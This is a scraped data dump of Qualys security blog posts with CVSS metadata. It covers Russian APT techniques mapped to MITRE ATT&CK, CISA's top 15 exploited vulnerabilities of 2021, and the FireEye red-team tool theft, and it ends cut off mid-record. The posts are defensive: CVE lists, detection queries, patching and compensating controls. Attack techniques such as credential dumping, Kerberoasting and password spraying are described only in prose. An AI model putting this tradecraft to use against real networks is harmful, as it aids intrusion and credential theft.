\nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]| Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]| Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks. \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)]| Brute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)]| Russian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns. \nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]| Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`. \nSteal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)]| Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking. \nCredentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)]| Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)]| Russian state-sponsored APT actors have exploited Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers. \nUnsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)]| Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates. \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]| Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)]| Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-26T20:20:32", "type": "qualysblog", "title": "Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-26T20:20:32", "id": "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-11T05:29:14", "description": "_The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors._\n\n### CISA\u2019s Top 15 Routinely Exploited Vulnerabilities of 2021\n\nThe top 15 routine vulnerability exploits observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. are:\n\nCVE| Vulnerability Name| Vendor and Product| Type \n---|---|---|--- \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE) \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService Plus| RCE \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence Server and Data Center| Arbitrary code execution \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal \n \n### Highlights of Top Vulnerabilities Cited in CISA 2021 Report\n\nBased on the analysis of this report by the Qualys Research Team, let\u2019s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them.\n\n#### Log4Shell Vulnerability\n\nThe Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted code string, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products used Log4Shell and were vulnerable to the Log4Shell exploitation.\n\nVisit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.\n\n### ProxyShell: Multiple Vulnerabilities\n\nThe multiple vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via "vulnerability chaining") enables a remote actor to execute arbitrary code and privilege escalation.\n\n### ProxyLogon: Multiple Vulnerabilities\n\nThe multiple vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.\n\n[Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.\n\n#### Confluence Server and Data Center Vulnerability\n\nAn Object Graph Navigation Library injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\n#### Top Vulnerabilities of 2020 Persist\n\nThree additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.\n\n### How Can Qualys Help?\n\nThe Qualys Research Team stays on top of CISA\u2019s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.\n\n#### Detect CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities.\n\nUsing VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nView vulnerabilities be severity in Qualys VMDR\n\nQualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as they may propagate across multiple assets in your infrastructure.\n\nDashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited\n\nQualys Unified Dashboard\n\n#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company\u2019s internet-facing assets. To do so, apply the tag \u201cInternet Facing Assets\u201d in the Prioritization tab. You can add tags like "Cloud Environments", "Type: Servers", "Web Servers", and "VMDR-Web Servers" to increase your scope of assets.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nPrioritizing vulnerabilities for remediation in Qualys VMDR\n\n#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.\n\nTo view the patchable QIDs, enable the "Show only Patchable" toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.\n\nUsing Qualys Patch Management to apply patches\n\nQualys Patch Management also provides the ability to deploy custom patches. The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nViewing available patches in Qualys Patch Management\n\nFor additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.\n\n### Getting Started\n\nReady to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T12:19:24", "type": "qualysblog", "title": "CISA Alert: Top 15 Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-06T12:19:24", "id": "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T00:22:53", "description": "**Update Jan 5, 2021**: New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\n**Update Dec 23, 2020**: Added a new section on compensating controls.\n\n**Update Dec 22, 2020: **FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.\n\nUsing Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n**Original post**: On December 8, 2020, [FireEye disclosed](<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>) theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security posture of their customers. According to FireEye, the hackers now have an influential collection of new techniques to draw upon. It is unclear today if the attackers intend to use the tools themselves or if they intend to release the tools publicly in some way. \n\n\u201cThe attackers tailored their world-class capabilities specifically to target and attack FireEye. They are highly trained in operational security and executed with discipline and focus. They operated clandestinely, using methods that counter security tools and forensic examination,\u201d said Kevin Mandia, CEO of FireEye. However, the stolen tools did not contain zero-day exploits. \n\nIn response to the breach, FireEye has provided Red Team tool countermeasures which are [available on GitHub](<https://github.com/fireeye/red_team_tool_countermeasures>). These countermeasures include rules in multiple languages such as Snort, Yara, ClamAV and HXIOC. Since none of the leaked tools leverage zero-day attacks, FireEye also provided a [listing of CVEs](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) used by these tools. \n\nAn analysis of these tools shows that the functionality and capabilities may mimic some existing red team tools such as Metasploit or Cobalt Strike. Similar to how the Shadow Brokers leak led to outbreaks such as WannaCry, it is possible that this breach could lead to other commodity malware leveraging these capabilities. Any time there is high-fidelity threat intelligence such as the countermeasures provided by FireEye, it is important to look at it under the lens of how you can protect your organization going forward, as well as how you can validate if this has been used in your organization previously. \n\n### Mitigation & Protection \n\n[Snort](<https://www.snort.org/>) is an open-source intrusion prevention system (IPS) which uses an open format for its rule structure. While many companies use the open-source version of Snort, commercial IPS tools are also able to leverage the Snort rule format. Most of these rules are tuned to specifically look for beacon traffic or components of remote access tools. If your organization is using an IPS or IDS, you should plug in these signatures to look for evidence of future exploitation.\n\n[ClamAV](<https://www.clamav.net/>) is an open-source antivirus engine which is now owned by Cisco. To prevent these tools from executing on the endpoint, the provided signatures can be imported into this AV engine or any other antivirus which uses the ClamAV engine.\n\n[Yara](<https://github.com/VirusTotal/yara>) was designed by VirusTotal to help malware researchers both identify and classify malware samples. Yara can be used as a standalone scanning engine or built in to many endpoint security products as well. The provided rules can be imported into many endpoint security tools to match and block future execution of known malware.\n\nAnother important aspect for preventing the usage of these red teaming tools in your environment is to address the vulnerabilities they are known to exploit. There are 16 vulnerabilities which have been prioritized based on the CVSS score associated with them. Using a vulnerability management product such as [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can proactively search which endpoints or devices have these vulnerabilities and deploy patches or configuration fixes to resolve them before an adversary has a chance to exploit them. \n\n### Threat Hunting \n\nHunting for evidence of a breach is just as important as trying to prevent the breach. Two of the components FireEye released to help this search are HXIOC and Yara rules. These help define what triggers to look for to make the determination if the organization has been breached by these tools. \n\nThe HXIOC rules provided are based on the [OpenIOC](<https://github.com/mandiant/OpenIOC_1.1>) format originally created by Mandiant. These are similar to the STIX and CyBOX formats maintained by [OASIS](<https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cti>). The rules provided by FireEye call out many process names and associated command line arguments which can be used to hunt for the evidence of an attack. \n\nBy using the provided Yara rule which encompasses all of the Yara countermeasures, you can scan multiple directories using the standalone Yara engine by issuing the \u201cyara -r all-rules.yara <path>\u201d, where <path> is the location you want to recursively scan. \n\nAlternatively, VirusTotal also has a useful API called [RetroHunt](<https://support.virustotal.com/hc/en-us/articles/360001293377-Retrohunt>) which allows you to scan files submitted within the last 12 months. [Florian Roth](<https://twitter.com/cyb3rops/status/1336583694912516096>) has gone through and submitted all of the provided Yara rules to RetroHunt and created a [Google Sheets document](<https://docs.google.com/spreadsheets/d/1uRAT-khTdp7fp15XwkiDXo8bD0FzbdkevJ2CeyXeORs/edit>) containing all of the detections. In this document you can see valuable information such as the number of detections and file hashes for each of the detected samples. \n\n### Detect 16 Publicly Known Vulnerabilities using Qualys VMDR \n\nHere is a prioritized list of CVEs published on [Github](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) by FireEye:\n\n**CVE** **ID**| **Name**| **CVSS**| **Qualys** **QID(s)** \n---|---|---|--- \nCVE-2019-11510| Pre-auth arbitrary file reading from Pulse Secure SSL VPNs| 10| 38771 \nCVE-2020-1472| Microsoft Active Directory escalation of privileges| 10| 91668 \nCVE-2018-13379| pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN| 9.8| 43702 \nCVE-2018-15961| RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell)| 9.8| 371186 \nCVE-2019-0604| RCE for Microsoft Sharepoint| 9.8| 110330 \nCVE-2019-0708| RCE of Windows Remote Desktop Services (RDS)| 9.8| 91541, 91534 \nCVE-2019-11580| Atlassian Crowd Remote Code Execution| 9.8| 13525 \nCVE-2019-19781| RCE of Citrix Application Delivery Controller and Citrix Gateway| 9.8| 150273, 372305 \nCVE-2020-10189| RCE for ZoHo ManageEngine Desktop Central| 9.8| 372442 \nCVE-2014-1812| Windows Local Privilege Escalation| 9| 91148, 90951 \nCVE-2019-3398| Confluence Authenticated Remote Code Execution| 8.8| 13475 \nCVE-2020-0688| Remote Command Execution in Microsoft Exchange| 8.8| 50098 \nCVE-2016-0167| local privilege escalation on older versions of Microsoft Windows| 7.8| 91204 \nCVE-2017-11774| RCE in Microsoft Outlook via crafted document execution (phishing)| 7.8| 110306 \nCVE-2018-8581| Microsoft Exchange Server escalation of privileges| 7.4| 53018 \nCVE-2019-8394| Arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus| 6.5| 374547 \n \nQualys released several remote and authenticated QIDs for CVEs published by FireEye. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid: [38771, 91668, 43702, 371186, 110330, 91541, 91534, 13525, 150273, 372305, 372442, 91148, 90951, 13475, 50098, 91204, 110306, 53018, 374547]_\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities. \n\n\n\nWith VMDR Dashboard, you can track these 16 publicly known vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [FireEye Theft Top 16 CVEs & IOC Hashes](<https://qualys-secure.force.com/customer/s/article/000006470>) dashboard. \n\n \n\n### **Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools** \n\nTo reduce the overall security risk, it is important to address misconfigurations associated with the CVEs in addition to general security hygiene and system hardening. \n\nQualys customers can leverage the newly released policy \u201c_Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools_.\u201d This policy contains controls which can be used as workarounds / mitigations for these vulnerabilities if patching cannot be done immediately. \n\n**Control List: ** \n\nCVE IDs| Control ID | Statement \n---|---|--- \nCVE-2020-1472| 20002| Status of the 'Domain controller: Allow vulnerable Netlogon secure channel connections' Group policy setting \nCVE-2018-13379 | 20010 | Status of the source interface setting for SSL-VPN \nCVE-2019-19781| 13952 | Status of 'Responder' feature configured on the appliance \nCVE-2019-19781 | 20011 | Status of the responder action configured on the device \nCVE-2019-19781 | 20008 | Status of the responder policies configured on the device \nCVE-2019-19781 | 20009 | Status of the responder global binds configured on the device \nCVE-2016-0167 | 19440 | Status of Trust Center "Block macros from running in Office files from the Internet" setting for a user profile \nCVE-2018-8581 | 20007 | Status of the 'DisableLoopbackCheck' setting \nCVE-2019-0708 | 10404 | Status of the 'Require user authentication for remote connections by using Network Level Authentication' setting \nCVE-2019-0708 | 7519 | Status of the 'Allow users to connect remotely using Remote Desktop Services (Terminal Services)' setting \nCVE-2019-0708 | 1430 | Status of the 'Terminal Services' service \nCVE-2019-0708 | 3932 | Status of the 'Windows Firewall: Inbound connections (Public)' setting \nCVE-2019-0708 | 3948 | Status of the 'Windows Firewall: Inbound connections (Private)' setting \nCVE-2019-0708 | 3949 | Status of the 'Windows Firewall: Inbound connections (Domain)' setting \nCVE-2019-0708 | 3950 | Status of the 'Windows Firewall: Firewall state (Public)' setting \nCVE-2019-0708 | 3951 | Status of the 'Windows Firewall: Firewall state (Private)' setting \nCVE-2019-0708 | 3952 | Status of the 'Windows Firewall: Firewall state (Domain)' setting \nCVE-2019-0708 | 11220 | List of 'Inbound Rules' configured in Windows Firewall with Advanced Security via GPO \nCVE-2017-11774 | 13843 | Status of the 'Do not allow folders in non-default stores to be set as folder home pages' setting \nCVE-2017-11774 | 20003 | Status of the 'EnableRoamingFolderHomepages' registry setting \nCVE-2017-11774 | 20004 | Status of the 'Do not allow Home Page URL to be set in folder Properties' Group policy setting \n \nWith Qualys Configuration Management, you can easily identify misconfigured systems in context of these vulnerabilities. The screenshot below shows the total passing and failing controls for the impacted assets in the report.\n\n\n\nView control posture details with remediation steps. The screenshot below shows control pass/fail details along with actual evidence from impacted asset. \n\n\n\n### FireEye Disclosure of the Theft of their Red Team Assessment Tools \n\nHackers now have an influential collection of new techniques to draw upon. Qualys released a new RTI for Solorigate/SUNBURST vulnerabilities so customers can effectively prioritize these CVEs in their environment.\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following real-time threat indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n### Remediate FireEye-Related Vulnerabilities with Qualys Patch Management\n\n#### Identify and Install Needed Patches\n\nTo view the relevant missing patches in your environment that are required to remediate the vulnerabilities leveraged by the FireEye tools you may run the following QQL in the Patches tab of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>):\n \n \n (qid: [91541,372442,38771,91534,91204,110330,371186,91148,90951,43702,374547,372305,110306,50098,91668,13475,53018,13525,150273])\n\n\n\nIt is highly recommended to select all the patches returned by this QQL and add them to a new on-demand patch job. You can then target as many assets as possible and deploy the patch job as soon as possible. Note that the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) will only deploy the right patch to the right asset, meaning the Qualys patch job will do the mapping of patch to asset (so you don\u2019t have to) ensuring only the right patch is deployed to the right asset (in terms of binary architecture, OS version, etc). In addition, if a patch is not needed by a specific asset the Qualys agent will \u201cskip\u201d this asset and the patch will not be deployed.\n\nThe same QQL can be used in the patch assets tab in order to see all the assets that miss at least one of the FireEye-related patches:\n\n\n\n#### Visualize Assets Requiring Patches\n\nQualys has created two dashboard widgets that you can import into the patch management dashboard. These widgets will show the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\nSteps to Import the Widget:\n\n * Click on "Setting" icon in "Dashboard" section.\n * Select "Import New Widget" option.\n * Enter a name of your choice for the widget.\n * Browse the JSON file to import.\n * Click on "Import" button.\n * On success, you should see the new widget in your Dashboard.\n\nYou can download these two dashboard widgets from the PatchMGMT-Fireeye-Widgets attachment at the bottom of the [FireEye Theft dashboards](<https://qualys-secure.force.com/customer/s/article/000006470>) article. \n\n### Hunting in Endpoint Detection and Response (EDR) \n\nThere are two components to hunt for evidence of these tools using the [Qualys EDR](<https://www.qualys.com/apps/endpoint-detection-response/>). The first is looking for evidence of the files from the provided Yara signatures. Qualys has taken the file hashes from the RetroHunt tool and created a dashboard. With a single click you can find evidence of any matches in your environment. \n\nThe second component is hunting for evidence of the processes outlined in the OpenIOC signatures. While these signatures cannot be imported directly into Qualys EDR, the Qualys Labs team is converting these into Qualys Query Language (QQL) which can be used in the Qualys EDR hunting page. An example provided here shows hunting for [this Seatbelt signature](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/rules/BELTALOWDA/supplemental/hxioc/SEATBELT%20\\(UTILITY\\).ioc>). In the coming days, these hunting queries will be available to all Qualys EDR customers. \n\n\n\n\n\n### Get Started Now \n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch the high-priority publicly known vulnerabilities. \n\nStart your [Qualys EDR trial](<https://www.qualys.com/apps/endpoint-detection-response/>) to protect the entire attack chain, from attack and breach prevention to detection and response using the power of the Qualys Cloud Platform \u2013 all in a single, cloud-based app. \n\nStart your [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) trial to access the Live Threat Intelligence Feed that displays the latest vulnerability disclosures and maps them to your impacted IT assets. You can see the number of assets affected by each threat, and drill down into asset details. \n\n### References \n\n<https://github.com/fireeye/red_team_tool_countermeasures>\n\n<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>\n\n<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>\n\n<https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html>", "cvss3": {}, "published": "2020-12-10T00:48:29", "type": "qualysblog", "title": "Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-1812", "CVE-2016-0167", "CVE-2017-11774", "CVE-2018-13379", "CVE-2018-15961", "CVE-2018-8581", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-19781", "CVE-2019-3398", "CVE-2019-8394", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-10T00:48:29", "id": 